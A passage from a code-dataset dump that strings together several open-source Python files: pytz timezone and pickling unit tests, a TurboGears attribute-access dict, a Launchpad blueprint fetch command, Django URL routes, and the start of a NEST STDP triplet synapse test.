# datetime.time.{utcoffset, dst, tzname} work as documented.
dst_tz = pytz.timezone('US/Eastern')
# This information is not known when we don't have a date,
# so return None per API.
self.assertTrue(dst_tz.utcoffset(None) is None)
self.assertTrue(dst_tz.dst(None) is None)
# We don't know the abbreviation, but this is still a valid
# tzname per the Python documentation.
self.assertEqual(dst_tz.tzname(None), 'US/Eastern')
def clearCache(self):
pytz._tzinfo_cache.clear()
def testUnicodeTimezone(self):
# We need to ensure that cold lookups work for both Unicode
# and traditional strings, and that the desired singleton is
# returned.
self.clearCache()
eastern = pytz.timezone(unicode('US/Eastern'))
self.assertTrue(eastern is pytz.timezone('US/Eastern'))
self.clearCache()
eastern = pytz.timezone('US/Eastern')
self.assertTrue(eastern is pytz.timezone(unicode('US/Eastern')))
class PicklingTest(unittest.TestCase):
def _roundtrip_tzinfo(self, tz):
p = pickle.dumps(tz)
unpickled_tz = pickle.loads(p)
self.assertTrue(tz is unpickled_tz, '%s did not roundtrip' % tz.zone)
def _roundtrip_datetime(self, dt):
# Ensure that the tzinfo attached to a datetime instance
# is identical to the one returned. This is important for
# DST timezones, as some state is stored in the tzinfo.
tz = dt.tzinfo
p = pickle.dumps(dt)
unpickled_dt = pickle.loads(p)
unpickled_tz = unpickled_dt.tzinfo
self.assertTrue(tz is unpickled_tz, '%s did not roundtrip' % tz.zone)
def testDst(self):
tz = pytz.timezone('Europe/Amsterdam')
dt = datetime(2004, 2, 1, 0, 0, 0)
for localized_tz in tz._tzinfos.values():
self._roundtrip_tzinfo(localized_tz)
self._roundtrip_datetime(dt.replace(tzinfo=localized_tz))
def testRoundtrip(self):
dt = datetime(2004, 2, 1, 0, 0, 0)
for zone in pytz.all_timezones:
tz = pytz.timezone(zone)
self._roundtrip_tzinfo(tz)
def testDatabaseFixes(self):
# Hack the pickle to make it refer to a timezone abbreviation
# that does not match anything. The unpickler should be able
# to repair this case
tz = pytz.timezone('Australia/Melbourne')
p = pickle.dumps(tz)
tzname = tz._tzname
hacked_p = p.replace(_byte_string(tzname), _byte_string('???'))
self.assertNotEqual(p, hacked_p)
unpickled_tz = pickle.loads(hacked_p)
self.assertTrue(tz is unpickled_tz)
# Simulate a database correction. In this case, the incorrect
# data will continue to be used.
p = pickle.dumps(tz)
new_utcoffset = tz._utcoffset.seconds + 42
# Python 3 introduced a new pickle protocol where numbers are stored in
# hexadecimal representation. Here we extract the pickle
# representation of the number for the current Python version.
old_pickle_pattern = pickle.dumps(tz._utcoffset.seconds)[3:-1]
new_pickle_pattern = pickle.dumps(new_utcoffset)[3:-1]
hacked_p = p.replace(old_pickle_pattern, new_pickle_pattern)
self.assertNotEqual(p, hacked_p)
unpickled_tz = pickle.loads(hacked_p)
self.assertEqual(unpickled_tz._utcoffset.seconds, new_utcoffset)
self.assertTrue(tz is not unpickled_tz)
def testOldPickles(self):
# Ensure that applications serializing pytz instances as pickles
# have no troubles upgrading to a new pytz release. These pickles
# where created with pytz2006j
east1 = pickle.loads(_byte_string(
"cpytz\n_p\np1\n(S'US/Eastern'\np2\nI-18000\n"
"I0\nS'EST'\np3\ntRp4\n."
))
east2 = pytz.timezone('US/Eastern')
self.assertTrue(east1 is east2)
# Confirm changes in name munging between 2006j and 2007c cause
# no problems.
pap1 = pickle.loads(_byte_string(
"cpytz\n_p\np1\n(S'America/Port_minus_au_minus_Prince'"
"\np2\nI-17340\nI0\nS'PPMT'\np3\ntRp4\n."))
pap2 = pytz.timezone('America/Port-au-Prince')
self.assertTrue(pap1 is pap2)
gmt1 = pickle.loads(_byte_string(
"cpytz\n_p\np1\n(S'Etc/GMT_plus_10'\np2\ntRp3\n."))
gmt2 = pytz.timezone('Etc/GMT+10')
self.assertTrue(gmt1 is gmt2)
class USEasternDSTStartTestCase(unittest.TestCase):
tzinfo = pytz.timezone('US/Eastern')
# 24 hours before DST changeover
transition_time = datetime(2002, 4, 7, 7, 0, 0, tzinfo=UTC)
# Increase for 'flexible' DST transitions due to 1 minute granularity
# of Python's datetime library
instant = timedelta(seconds=1)
# before transition
before = {
'tzname': 'EST',
'utcoffset': timedelta(hours = -5),
'dst': timedelta(hours = 0),
}
# after transition
after = {
'tzname': 'EDT',
'utcoffset': timedelta(hours = -4),
'dst': timedelta(hours = 1),
}
def _test_tzname(self, utc_dt, wanted):
tzname = wanted['tzname']
dt = utc_dt.astimezone(self.tzinfo)
self.assertEqual(dt.tzname(), tzname,
'Expected %s as tzname for %s. Got %s' % (
tzname, str(utc_dt), dt.tzname()
)
)
def _test_utcoffset(self, utc_dt, wanted):
utcoffset = wanted['utcoffset']
dt = utc_dt.astimezone(self.tzinfo)
self.assertEqual(
dt.utcoffset(), wanted['utcoffset'],
'Expected %s as utcoffset for %s. Got %s' % (
utcoffset, utc_dt, dt.utcoffset()
)
)
def _test_dst(self, utc_dt, wanted):
dst = wanted['dst']
dt = utc_dt.astimezone(self.tzinfo)
self.assertEqual(dt.dst(),dst,
'Expected %s as dst for %s. Got %s' % (
dst, utc_dt, dt.dst()
)
)
def test_arithmetic(self):
utc_dt = self.transition_time
for days in range(-420, 720, 20):
delta = timedelta(days=days)
# Make sure we can get back where we started
dt = utc_dt.astimezone(self.tzinfo)
dt2 = dt + delta
dt2 = dt2 - delta
self.assertEqual(dt, dt2)
# Make sure arithmetic crossing DST boundaries ends
# up in the correct timezone after normalization
utc_plus_delta = (utc_dt + delta).astimezone(self.tzinfo)
local_plus_delta = self.tzinfo.normalize(dt + delta)
self.assertEqual(
prettydt(utc_plus_delta),
prettydt(local_plus_delta),
'Incorrect result for delta==%d days. Wanted %r. Got %r'%(
days,
prettydt(utc_plus_delta),
prettydt(local_plus_delta),
)
)
def _test_all(self, utc_dt, wanted):
self._test_utcoffset(utc_dt, wanted)
self._test_tzname(utc_dt, wanted)
self._test_dst(utc_dt, wanted)
def testDayBefore(self):
self._test_all(
self.transition_time - timedelta(days=1), self.before
)
def testTwoHoursBefore(self):
self._test_all(
self.transition_time - timedelta(hours=2), self.before
)
def testHourBefore(self):
self._test_all(
self.transition_time - timedelta(hours=1), self.before
)
def testInstantBefore(self):
self._test_all(
self.transition_time - self.instant, self.before
)
def testTransition(self):
self._test_all(
self.transition_time, self.after
)
def testInstantAfter(self):
self._test_all(
self.transition_time + self.instant, self.after
)
def testHourAfter(self):
self._test_all(
self.transition_time + timedelta(hours=1), self.after
)
def testTwoHoursAfter(self):
self._test_all(
self.transition_time + timedelta(hours=1), self.after
)
def testDayAfter(self):
self._test_all(
self.transition_time + timedelta(days=1), self.after
)
class USEasternDSTEndTestCase(USEasternDSTStartTestCase):
tzinfo = pytz.timezone('US/Eastern')
transition_time = datetime(2002, 10, 27, 6, 0, 0, tzinfo=UTC)
before = {
'tzname': 'EDT',
'utcoffset': timedelta(hours = -4),
'dst': timedelta(hours = 1),
}
after = {
'tzname': 'EST',
'utcoffset': timedelta(hours = -5),
'dst': timedelta(hours = 0),
}
class USEasternEPTStartTestCase(USEasternDSTStartTestCase):
transition_time = datetime(1945, 8, 14, 23, 0, 0, tzinfo=UTC)
before = {
'tzname': 'EWT',
'utcoffset': timedelta(hours = -4),
'dst': timedelta(hours = 1),
}
after = {
'tzname': 'EPT',
'utcoffset': timedelta(hours = -4),
'dst': timedelta(hours = 1),
}
class USEasternEPTEndTestCase(USEasternDSTStartTestCase):
transition_time = datetime(1945, 9, 30, 6, 0, 0, tzinfo=UTC)
before = {
'tzname': 'EPT',
'utcoffset': timedelta(hours = -4),
'dst': timedelta(hours = 1),
}
after = {
'tzname': 'EST',
'utcoffset': timedelta(hours = -5),
'dst': timedelta(hours = 0),
}
class WarsawWMTEndTestCase(USEasternDSTStartTestCase):
# In 1915, Warsaw changed from Warsaw to Central European time.
# This involved the clocks being set backwards, causing a end-of-DST
# like situation without DST being involved.
tzinfo = pytz.timezone('Europe/Warsaw')
transition_time = datetime(1915, 8, 4, 22, 36, 0, tzinfo=UTC)
before = {
'tzname': 'WMT',
'utcoffset': timedelta(hours=1, minutes=24),
'dst': timedelta(0),
}
after = {
'tzname': 'CET',
'utcoffset': timedelta(hours=1),
'dst': timedelta(0),
}
class VilniusWMTEndTestCase(USEasternDSTStartTestCase):
# At the end of 1916, Vilnius changed timezones putting its clock
# forward by 11 minutes 35 seconds. Neither timezone was in DST mode.
tzinfo = pytz.timezone('Europe/Vilnius')
instant = timedelta(seconds=31)
transition_time = datetime(1916, 12, 31, 22, 36, 00, tzinfo=UTC)
before = {
'tzname': 'WMT',
'utcoffset': timedelta(hours=1, minutes=24),
'dst': timedelta(0),
}
after = {
'tzname': 'KMT',
'utcoffset': timedelta(hours=1, minutes=36), # Really 1:35:36
'dst': timedelta(0),
}
class VilniusCESTStartTestCase(USEasternDSTStartTestCase):
# In 1941, Vilnius changed from MSG to CEST, switching to summer
# time while simultaneously reducing its UTC offset by two hours,
# causing the clocks to go backwards for this summer time
# switchover.
tzinfo = pytz.timezone('Europe/Vilnius')
transition_time = datetime(1941, 6, 23, 21, 00, 00, tzinfo=UTC)
before = {
'tzname': 'MSK',
'utcoffset': timedelta(hours=3),
'dst': timedelta(0),
}
after = {
'tzname': 'CEST',
'utcoffset': timedelta(hours=2),
'dst': timedelta(hours=1),
}
class LondonHistoryStartTestCase(USEasternDSTStartTestCase):
# The first known timezone transition in London was in 1847 when
# clocks where synchronized to GMT. However, we currently only
# understand v1 format tzfile(5) files which does handle years
# this far in the past, so our earliest known transition is in
# 1916.
tzinfo = pytz.timezone('Europe/London')
# transition_time = datetime(1847, 12, 1, 1, 15, 00, tzinfo=UTC)
# before = {
# 'tzname': 'LMT',
# 'utcoffset': timedelta(minutes=-75),
# 'dst': timedelta(0),
# }
# after = {
# 'tzname': 'GMT',
# 'utcoffset': timedelta(0),
# 'dst': timedelta(0),
# }
transition_time = datetime(1916, 5, 21, 2, 00, 00, tzinfo=UTC)
before = {
'tzname': 'GMT',
'utcoffset': timedelta(0),
'dst': timedelta(0),
}
after = {
'tzname': 'BST',
'utcoffset': timedelta(hours=1),
'dst': timedelta(hours=1),
}
class LondonHistoryEndTestCase(USEasternDSTStartTestCase):
# Timezone switchovers are projected into the future, even
# though no official statements exist or could be believed even
# if they did exist. We currently only check the last known
# transition in 2037, as we are still using v1 format tzfile(5)
# files.
tzinfo = pytz.timezone('Europe/London')
# transition_time = datetime(2499, 10, 25, 1, 0, 0, tzinfo=UTC)
transition_time = datetime(2037, 10, 25, 1, 0, 0, tzinfo=UTC)
before = {
'tzname': 'BST',
'utcoffset': timedelta(hours=1),
'dst': timedelta(hours=1),
}
after = {
'tzname': 'GMT',
'utcoffset': timedelta(0),
'dst': timedelta(0),
}
class NoumeaHistoryStartTestCase(USEasternDSTStartTestCase):
# Noumea adopted a whole hour offset in 1912. Previously
# it was 11 hours, 5 minutes and 48 seconds off UTC. However,
# due to limitations of the Python datetime library, we need
# to round that to 11 hours 6 minutes.
tzinfo = pytz.timezone('Pacific/Noumea')
transition_time = datetime(1912, 1, 12, 12, 54, 12, tzinfo=UTC)
before = {
'tzname': 'LMT',
'utcoffset': timedelta(hours=11, minutes=6),
'dst': timedelta(0),
}
after = {
'tzname': 'NCT',
'utcoffset': timedelta(hours=11),
'dst': timedelta(0),
}
class NoumeaDSTEndTestCase(USEasternDSTStartTestCase):
# Noumea dropped DST in 1997.
tzinfo = pytz.timezone('Pacific/Noumea')
transition_time = datetime(1997, 3, 1, 15, 00, 00, tzinfo=UTC)
before = {
'tzname': 'NCST',
'utcoffset': timedelta(hours=12),
'dst': timedelta(hours=1),
}
after = {
'tzname': 'NCT',
'utcoffset': timedelta(hours=11),
'dst': timedelta(0),
}
class NoumeaNoMoreDSTTestCase(NoumeaDSTEndTestCase):
# Noumea dropped DST in 1997. Here we test that it stops occuring.
transition_time = (
NoumeaDSTEndTestCase.transition_time + timedelta(days=365*10))
before = NoumeaDSTEndTestCase.after
after = NoumeaDSTEndTestCase.after
class TahitiTestCase(USEasternDSTStartTestCase):
# Tahiti has had a single transition in its history.
tzinfo = pytz.timezone('Pacific/Tahiti')
transition_time = datetime(1912, 10, 1, 9, 58, 16, tzinfo=UTC)
before = {
'tzname': 'LMT',
'utcoffset': timedelta(hours=-9, minutes=-58),
'dst': timedelta(0),
}
after = {
'tzname': 'TAHT',
'utcoffset': timedelta(hours=-10),
'dst': timedelta(0),
}
class SamoaInternationalDateLineChange(USEasternDSTStartTestCase):
# At the end of 2011, Samoa will switch from being east of the
# international dateline to the west. There will be no Dec 30th
# 2011 and it will switch from UTC-10 to UTC+14.
tzinfo = pytz.timezone('Pacific/Apia')
transition_time = datetime(2011, 12, 30, 10, 0, 0, tzinfo=UTC)
before = {
'tzname': 'WSDT',
'utcoffset': timedelta(hours=-10),
'dst': timedelta(hours=1),
}
after = {
'tzname': 'WSDT',
'utcoffset': timedelta(hours=14),
'dst': timedelta(hours=1),
}
class ReferenceUSEasternDSTStartTestCase(USEasternDSTStartTestCase):
tzinfo = reference.Eastern
def test_arithmetic(self):
# Reference implementation cannot handle this
pass
class ReferenceUSEasternDSTEndTestCase(USEasternDSTEndTestCase):
tzinfo = reference.Eastern
def testHourBefore(self):
# Python's datetime library has a bug, where the hour before
# a daylight savings transition is one hour out. For example,
# at the end of US/Eastern daylight savings time, 01:00 EST
# occurs twice (once at 05:00 UTC and once at 06:00 UTC),
# whereas the first should actually be 01:00 EDT.
# Note that this bug is by design - by accepting this ambiguity
# for one hour one hour per year, an is_dst flag on datetime.time
# became unnecessary.
self._test_all(
self.transition_time - timedelta(hours=1), self.after
)
def testInstantBefore(self):
self._test_all(
self.transition_time - timedelta(seconds=1), self.after
)
def test_arithmetic(self):
# Reference implementation cannot handle this
pass
class LocalTestCase(unittest.TestCase):
def testLocalize(self):
loc_tz = pytz.timezone('Europe/Amsterdam')
loc_time = loc_tz.localize(datetime(1930, 5, 10, 0, 0, 0))
# Actually +00:19:32, but Python datetime rounds this
self.assertEqual(loc_time.strftime('%Z%z'), 'AMT+0020')
loc_time = loc_tz.localize(datetime(1930, 5, 20, 0, 0, 0))
# Actually +00:19:32, but Python datetime rounds this
self.assertEqual(loc_time.strftime('%Z%z'), 'NST+0120')
loc_time = loc_tz.localize(datetime(1940, 5, 10, 0, 0, 0))
self.assertEqual(loc_time.strftime('%Z%z'), 'NET+0020')
loc_time = loc_tz.localize(datetime(1940, 5, 20, 0, 0, 0))
self.assertEqual(loc_time.strftime('%Z%z'), 'CEST+0200')
loc_time = loc_tz.localize(datetime(2004, 2, 1, 0, 0, 0))
self.assertEqual(loc_time.strftime('%Z%z'), 'CET+0100')
loc_time = loc_tz.localize(datetime(2004, 4, 1, 0, 0, 0))
self.assertEqual(loc_time.strftime('%Z%z'), 'CEST+0200')
tz = pytz.timezone('Europe/Amsterdam')
loc_time = loc_tz.localize(datetime(1943, 3, 29, 1, 59, 59))
self.assertEqual(loc_time.strftime('%Z%z'), 'CET+0100')
# Switch to US
loc_tz = pytz.timezone('US/Eastern')
# End of DST ambiguity check
loc_time = loc_tz.localize(datetime(1918, 10, 27, 1, 59, 59), is_dst=1)
self.assertEqual(loc_time.strftime('%Z%z'), 'EDT-0400')
loc_time = loc_tz.localize(datetime(1918, 10, 27, 1, 59, 59), is_dst=0)
self.assertEqual(loc_time.strftime('%Z%z'), 'EST-0500')
self.assertRaises(pytz.AmbiguousTimeError,
loc_tz.localize, datetime(1918, 10, 27, 1, 59, 59), is_dst=None
)
# Start of DST non-existent times
loc_time = loc_tz.localize(datetime(1918, 3, 31, 2, 0, 0), is_dst=0)
self.assertEqual(loc_time.strftime('%Z%z'), 'EST-0500')
loc_time = loc_tz.localize(datetime(1918, 3, 31, 2, 0, 0), is_dst=1)
self.assertEqual(loc_time.strftime('%Z%z'), 'EDT-0400')
self.assertRaises(pytz.NonExistentTimeError,
loc_tz.localize, datetime(1918, 3, 31, 2, 0, 0), is_dst=None
)
# Weird changes - war time and peace time both is_dst==True
loc_time = loc_tz.localize(datetime(1942, 2, 9, 3, 0, 0))
self.assertEqual(loc_time.strftime('%Z%z'), 'EWT-0400')
loc_time = loc_tz.localize(datetime(1945, 8, 14, 19, 0, 0))
self.assertEqual(loc_time.strftime('%Z%z'), 'EPT-0400')
loc_time = loc_tz.localize(datetime(1945, 9, 30, 1, 0, 0), is_dst=1)
self.assertEqual(loc_time.strftime('%Z%z'), 'EPT-0400')
loc_time = loc_tz.localize(datetime(1945, 9, 30, 1, 0, 0), is_dst=0)
self.assertEqual(loc_time.strftime('%Z%z'), 'EST-0500')
def testNormalize(self):
tz = pytz.timezone('US/Eastern')
dt = datetime(2004, 4, 4, 7, 0, 0, tzinfo=UTC).astimezone(tz)
dt2 = dt - timedelta(minutes=10)
self.assertEqual(
dt2.strftime('%Y-%m-%d %H:%M:%S %Z%z'),
'2004-04-04 02:50:00 EDT-0400'
)
dt2 = tz.normalize(dt2)
self.assertEqual(
dt2.strftime('%Y-%m-%d %H:%M:%S %Z%z'),
'2004-04-04 01:50:00 EST-0500'
)
def testPartialMinuteOffsets(self):
# utcoffset in Amsterdam was not a whole minute until 1937
# However, we fudge this by rounding them, as the Python
# datetime library
tz = pytz.timezone('Europe/Amsterdam')
utc_dt = datetime(1914, 1, 1, 13, 40, 28, tzinfo=UTC) # correct
utc_dt = utc_dt.replace(second=0) # But we need to fudge it
loc_dt = utc_dt.astimezone(tz)
self.assertEqual(
loc_dt.strftime('%Y-%m-%d %H:%M:%S %Z%z'),
'1914-01-01 14:00:00 AMT+0020'
)
# And get back...
utc_dt = loc_dt.astimezone(UTC)
self.assertEqual(
utc_dt.strftime('%Y-%m-%d %H:%M:%S %Z%z'),
'1914-01-01 13:40:00 UTC+0000'
)
def no_testCreateLocaltime(self):
# It would be nice if this worked, but it doesn't.
tz = pytz.timezone('Europe/Amsterdam')
dt = datetime(2004, 10, 31, 2, 0, 0, tzinfo=tz)
self.assertEqual(
dt.strftime(fmt),
'2004-10-31 02:00:00 CET+0100'
)
class CommonTimezonesTestCase(unittest.TestCase):
def test_bratislava(self):
# Bratislava is the default timezone for Slovakia, but our
# heuristics where not adding it to common_timezones. Ideally,
# common_timezones should be populated from zone.tab at runtime,
# but I'm hesitant to pay the startup cost as loading the list
# on demand whilst remaining backwards compatible seems
# difficult.
self.assertTrue('Europe/Bratislava' in pytz.common_timezones)
self.assertTrue('Europe/Bratislava' in pytz.common_timezones_set)
def test_us_eastern(self):
self.assertTrue('US/Eastern' in pytz.common_timezones)
self.assertTrue('US/Eastern' in pytz.common_timezones_set)
def test_belfast(self):
# Belfast uses London time.
self.assertTrue('Europe/Belfast' in pytz.all_timezones_set)
self.assertFalse('Europe/Belfast' in pytz.common_timezones)
self.assertFalse('Europe/Belfast' in pytz.common_timezones_set)
class BaseTzInfoTestCase:
'''Ensure UTC, StaticTzInfo and DstTzInfo work consistently.
These tests are run for each type of tzinfo.
'''
tz = None # override
tz_class = None # override
def test_expectedclass(self):
self.assertTrue(isinstance(self.tz, self.tz_class))
def test_fromutc(self):
# naive datetime.
dt1 = datetime(2011, 10, 31)
# localized datetime, same timezone.
dt2 = self.tz.localize(dt1)
# Both should give the same results. Note that the standard
# Python tzinfo.fromutc() only supports the second.
for dt in [dt1, dt2]:
loc_dt = self.tz.fromutc(dt)
loc_dt2 = pytz.utc.localize(dt1).astimezone(self.tz)
self.assertEqual(loc_dt, loc_dt2)
# localized datetime, different timezone.
new_tz = pytz.timezone('Europe/Paris')
self.assertTrue(self.tz is not new_tz)
dt3 = new_tz.localize(dt1)
self.assertRaises(ValueError, self.tz.fromutc, dt3)
def test_normalize(self):
other_tz = pytz.timezone('Europe/Paris')
self.assertTrue(self.tz is not other_tz)
dt = datetime(2012, 3, 26, 12, 0)
other_dt = other_tz.localize(dt)
local_dt = self.tz.normalize(other_dt)
self.assertTrue(local_dt.tzinfo is not other_dt.tzinfo)
self.assertNotEqual(
local_dt.replace(tzinfo=None), other_dt.replace(tzinfo=None))
def test_astimezone(self):
other_tz = pytz.timezone('Europe/Paris')
self.assertTrue(self.tz is not other_tz)
dt = datetime(2012, 3, 26, 12, 0)
other_dt = other_tz.localize(dt)
local_dt = other_dt.astimezone(self.tz)
self.assertTrue(local_dt.tzinfo is not other_dt.tzinfo)
self.assertNotEqual(
local_dt.replace(tzinfo=None), other_dt.replace(tzinfo=None))
class OptimizedUTCTestCase(unittest.TestCase, BaseTzInfoTestCase):
tz = pytz.utc
tz_class = tz.__class__
class LegacyUTCTestCase(unittest.TestCase, BaseTzInfoTestCase):
# Deprecated timezone, but useful for comparison tests.
tz = pytz.timezone('Etc/UTC')
tz_class = StaticTzInfo
class StaticTzInfoTestCase(unittest.TestCase, BaseTzInfoTestCase):
tz = pytz.timezone('GMT')
tz_class = StaticTzInfo
class DstTzInfoTestCase(unittest.TestCase, BaseTzInfoTestCase):
tz = pytz.timezone('Australia/Melbourne')
tz_class = DstTzInfo
def test_suite():
suite = unittest.TestSuite()
suite.addTest(doctest.DocTestSuite('pytz'))
suite.addTest(doctest.DocTestSuite('pytz.tzinfo'))
import test_tzinfo
suite.addTest(unittest.defaultTestLoader.loadTestsFromModule(test_tzinfo))
return suite
if __name__ == '__main__':
warnings.simplefilter("error") # Warnings should be fatal in tests.
unittest.main(defaultTest='test_suite')
| lthurlow/Network-Grapher | proj/external/matplotlib-1.2.1/lib/pytz/tests/test_tzinfo.py | Python | mit | 28,136 |
from tg.configuration.utils import get_partial_dict
class Bunch(dict):
"""A dictionary that provides attribute-style access."""
def __getitem__(self, key):
return dict.__getitem__(self, key)
def __getattr__(self, name):
try:
return self[name]
except KeyError:
return get_partial_dict(name, self, Bunch)
__setattr__ = dict.__setitem__
def __delattr__(self, name):
try:
del self[name]
except KeyError:
raise AttributeError(name)
| lucius-feng/tg2 | tg/util/bunch.py | Python | mit | 541 |
from .. import db
from .. import lp
def get_command():
return Command()
class Command(object):
name = 'fetch'
help = ('Download all valid blueprints from launchpad for projects '
'and save in a local file.')
def add_arguments(self, parser):
parser.add_argument('projects', nargs='+', metavar='project')
parser.add_argument('--file', default='.hoke-db')
def execute(self, args):
hoke_db = db.new_db(args.file)
launchpad = lp.new_connection()
for project in args.projects:
lp_project = launchpad.get_project(project)
for bp in lp_project.get_blueprints():
hoke_db.add_blueprint(bp)
hoke_db.close()
| markwash/hoke | hoke/commands/fetch.py | Python | bsd-2-clause | 721 |
from django.conf.urls import url
from .import views
#url(r'^view/(?P<article_id>[0-9]+)/$',views.view,name='view'),
urlpatterns=[
url(r'^$', views.index, name='index'),
url(r'^login/$', views.login, name='login'),
url(r'^logout/$', views.logout, name='logout'),
url(r'^dev/add/$', views.dev_add, name='dev_add'),
url(r'^dev/edit/(?P<id>[0-9]+)/$', views.dev_edit, name='dev_edit'),
url(r'^dev/control/$', views.dev_control, name='dev_control'),
url(r'^dev/del/(?P<id>[0-9]+)/$', views.dev_del, name='dev_del'),
url(r'^usergroup/add/$', views.usgp_add, name='usgp_add'),
url(r'^usergroup/edit/(?P<id>[0-9]+)/$', views.usgp_edit, name='usgp_edit'),
url(r'^usergroup/del/(?P<id>[0-9]+)/$', views.usgp_del, name='usgp_del'),
url(r'^user/add/(?P<id>[0-9]+)/$', views.user_add, name='user_add'),
url(r'^user/edit/(?P<id>[0-9]+)/$', views.user_edit, name='user_edit'),
url(r'^user/del/(?P<id>[0-9]+)/$', views.user_del, name='user_del'),
url(r'^user/self/$', views.self, name='self'),
url(r'^data/history/(?P<id>.*)/$', views.data_history, name='data_history'),
url(r'^data/history/$', views.data_history, name='data_history'),
url(r'^data/warning/$', views.data_warning, name='data_warning'),
url(r'^data/control/(?P<action>.*)/$', views.data_control, name='data_control'),
url(r'^api/$',views.api,name='api'),
url(r'^ajax/$',views.ajax,name='ajax')
]
| zerovip/EMS | 环境监测系统/django/EMS/emsys/urls.py | Python | apache-2.0 | 1,465 |
# -*- coding: utf-8 -*-
#
# test_stdp_triplet_synapse.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
# This script tests the stdp_triplet_synapse in NEST.
import nest
import unittest
from math import exp
@nest.check_stack
class STDPTripletConnectionTestCase(unittest.TestCase):
"""Check stdp_triplet_connection model properties."""
def setUp(self):
nest.set_verbosity('M_WARNING')
nest.ResetKernel()
# settings
self.dendritic_delay = 1.0
self.decay_duration = 5.0
self.synapse_model = "stdp_triplet_synapse"
self.syn_spec = {
"model": self.synapse_model,
"delay": self.dendritic_delay,
"receptor_type": 1, # set receptor 1 post-synaptically, to not generate extra spikes
"weight": 5.0,
"tau_plus": 16.8,
"tau_plus_triplet": 101.0,
"Aplus": 0.1,
"Aminus": 0.1,
"Aplus_triplet": 0.1,
"Aminus_triplet": 0.1,
"Kplus": 0.0,
"Kplus_triplet": 0.0,
"Wmax": 100.0,
}
self.post_neuron_params = {
"tau_minus": 33.7,
"tau_minus_triplet": 125.0,
}
# setup basic circuit
self.pre_neuron = nest.Create("parrot_neuron")
self.post_neuron = nest.Create("parrot_neuron", 1, params=self.post_neuron_params)
nest.Connect(self.pre_neuron, self.post_neuron, syn_spec=self.syn_spec)
def generateSpikes(self, neuron, times):
"""Trigger spike to given neuron at specified times."""
delay = 1.
gen = nest.Create("spike_generator", 1, {"spike_times": [t-delay for t in times]})
nest.Connect(gen, neuron, syn_spec={"delay": delay})
def status(self, which):
"""Get synapse parameter status."""
stats = nest.GetConnections(self.pre_neuron, synapse_model=self.synapse_model)
return nest.GetStatus(stats, [which])[0][0]
def decay(self, time, Kplus, Kplus_triplet, Kminus, Kminus_triplet):
"""Decay variables."""
Kplus *= exp(- time / self.syn_spec["tau_plus"])
Kplus_triplet *= exp(- time / self.syn_spec["tau_plus_triplet"])
Kminus *= exp(- time / self.post_neuron_params["tau_minus"])
Kminus_triplet *= exp(- time / self.post_neuron_params["tau_minus_triplet"])
return (Kplus, Kplus_triplet, Kminus, Kminus_triplet)
def facilitate(self, w, Kplus, Kminus_triplet):
"""Facilitate weight."""
return w + Kplus * (self.syn_spec["Aplus"] + self.syn_spec["Aplus_triplet"] * Kminus_triplet)
def depress(self, w, Kminus, Kplus_triplet):
"""Depress weight."""
return w - Kminus * (self.syn_spec["Aminus"] + self.syn_spec["Aminus_triplet"] * Kplus_triplet)
def assertAlmostEqualDetailed(self, expected, given, message):
"""Improve assetAlmostEqual with detailed message."""
messageWithValues = "%s (expected: `%s` was: `%s`" % (message, str(expected), str(given))
self.assertAlmostEqual(given, expected, msg=messageWithValues)
def test_badPropertiesSetupsThrowExceptions(self):
"""Check that exceptions are thrown when setting bad parameters."""
def setupProperty(property):
bad_syn_spec = self.syn_spec.copy()
bad_syn_spec.update(property)
nest.Connect(self.pre_neuron, self.post_neuron, syn_spec=bad_syn_spec)
def badPropertyWith(content, parameters):
self.assertRaisesRegexp(nest.NESTError, "BadProperty(.+)" + content, setupProperty, parameters)
badPropertyWith("Kplus", {"Kplus": -1.0})
badPropertyWith("Kplus_triplet", {"Kplus_triplet": -1.0})
def test_varsZeroAtStart(self):
"""Check that pre and post-synaptic variables are zero at start."""
self.assertAlmostEqualDetailed(0.0, self.status("Kplus"), "Kplus should be zero")
self.assertAlmostEqualDetailed(0.0, self.status("Kplus_triplet"), "Kplus_triplet should be zero")
def test_preVarsIncreaseWithPreSpike(self):
"""Check that pre-synaptic variables (Kplus, Kplus_triplet) increase after each pre-synaptic spike."""
self.generateSpikes(self.pre_neuron, [2.0])
Kplus = self.status("Kplus")
Kplus_triplet = self.status("Kplus_triplet")
nest.Simulate(20.0)
self.assertAlmostEqualDetailed(Kplus + 1.0, self.status("Kplus"), "Kplus should have increased by 1")
self.assertAlmostEqualDetailed(Kplus_triplet + 1.0, self.status("Kplus_triplet"),
"Kplus_triplet should have increased by 1")
def test_preVarsDecayAfterPreSpike(self):
"""Check that pre-synaptic variables (Kplus, Kplus_triplet) decay after each pre-synaptic spike."""
self.generateSpikes(self.pre_neuron, [2.0])
self.generateSpikes(self.pre_neuron, [2.0 + self.decay_duration]) # trigger computation
(Kplus, Kplus_triplet, _, _) = self.decay(self.decay_duration, 1.0, 1.0, 0.0, 0.0)
Kplus += 1.0
Kplus_triplet += 1.0
nest.Simulate(20.0)
self.assertAlmostEqualDetailed(Kplus, self.status("Kplus"), "Kplus should have decay")
self.assertAlmostEqualDetailed(Kplus_triplet, self.status("Kplus_triplet"), "Kplus_triplet should have decay")
def test_preVarsDecayAfterPostSpike(self):
"""Check that pre-synaptic variables (Kplus, Kplus_triplet) decay after each post-synaptic spike."""
self.generateSpikes(self.pre_neuron, [2.0])
self.generateSpikes(self.post_neuron, [3.0, 4.0])
self.generateSpikes(self.pre_neuron, [2.0 + self.decay_duration]) # trigger computation
(Kplus, Kplus_triplet, _, _) = self.decay(self.decay_duration, 1.0, 1.0, 0.0, 0.0)
Kplus += 1.0
Kplus_triplet += 1.0
nest.Simulate(20.0)
self.assertAlmostEqualDetailed(Kplus, self.status("Kplus"), "Kplus should have decay")
self.assertAlmostEqualDetailed(Kplus_triplet, self.status("Kplus_triplet"), "Kplus_triplet should have decay")
def test_weightChangeWhenPrePostSpikes(self):
"""Check that weight changes whenever a pre-post spike pair happen."""
self.generateSpikes(self.pre_neuron, [2.0])
self.generateSpikes(self.post_neuron, [4.0])
self.generateSpikes(self.pre_neuron, [6.0]) # trigger computation
Kplus = self.status("Kplus")
Kplus_triplet = self.status("Kplus_triplet")
